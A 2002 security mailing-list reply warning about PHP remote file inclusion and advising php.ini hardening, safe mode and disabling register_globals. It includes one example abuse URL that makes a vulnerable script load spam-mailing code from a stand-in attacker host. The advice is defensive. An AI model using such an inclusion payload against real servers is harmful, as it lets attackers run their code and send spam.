Re: [suse-security] mail script scanner
2 Dec
2002
2 Dec
'02
12:19
What about cross side scripting. If any of the scripts running on your side allows to name a script url as a parameter that can be hosted on another server, you'll have a problem. Harden your php.ini, setup up safe mode for php, prevent register_globals and double check each script and the way it checks the parameter Example for abuse http://your.host.com/callsite?url=http://attackers.host.com/spammail.php Hope that helps Yours Michael
8067
Age (days ago)
8067
Last active (days ago)
0 comments
1 participants
participants (1)
-
GentooRulez